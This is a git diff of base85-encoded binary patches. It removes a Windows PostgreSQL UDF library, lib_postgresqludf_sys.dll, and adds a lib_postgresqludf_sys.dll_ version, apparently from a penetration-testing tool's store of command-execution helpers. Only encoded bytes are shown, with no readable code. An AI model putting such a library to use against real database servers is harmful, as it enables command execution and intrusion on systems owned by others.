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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll
deleted file mode 100755
index 43ba07ad6668a48be48eb94d209c3df210689be7..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6656
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

diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..2beba1d4c91a08e41593fe4b2106629381bc7b71
GIT binary patch
literal 4773
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
